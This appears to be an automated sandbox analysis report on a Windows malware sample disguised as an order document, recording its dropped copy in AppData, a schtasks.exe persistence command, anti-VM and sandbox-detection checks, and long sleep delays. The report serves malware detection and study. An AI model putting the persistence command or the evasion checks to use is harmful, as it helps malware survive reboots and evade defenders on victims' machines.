Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA1439 push cs; retf 0006h	4_2_06CA143A
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA143D push cs; retf 0006h	4_2_06CA143E
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA1431 push cs; retf 0006h	4_2_06CA1432
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA1435 push cs; retf 0006h	4_2_06CA1436
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA123F push es; retf	4_2_06CA1240
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Code function: 5_2_0E820FED push FFFFFF8Bh; iretd	5_2_0E820FEF

Source: initial sample	Static PE information: section name: .text entropy: 7.6706447927786225
Source: initial sample	Static PE information: section name: .text entropy: 7.6706447927786225

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

File created: C:\Users\user\AppData\Roaming\WsdnBq.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WsdnBq.exe PID: 6004, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe TID: 6024	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe TID: 4864	Thread sleep count: 8986 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe TID: 5116	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe TID: 5064	Thread sleep count: 8770 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Window / User API: threadDelayed 8986			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Window / User API: threadDelayed 8770			Jump to behavior

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

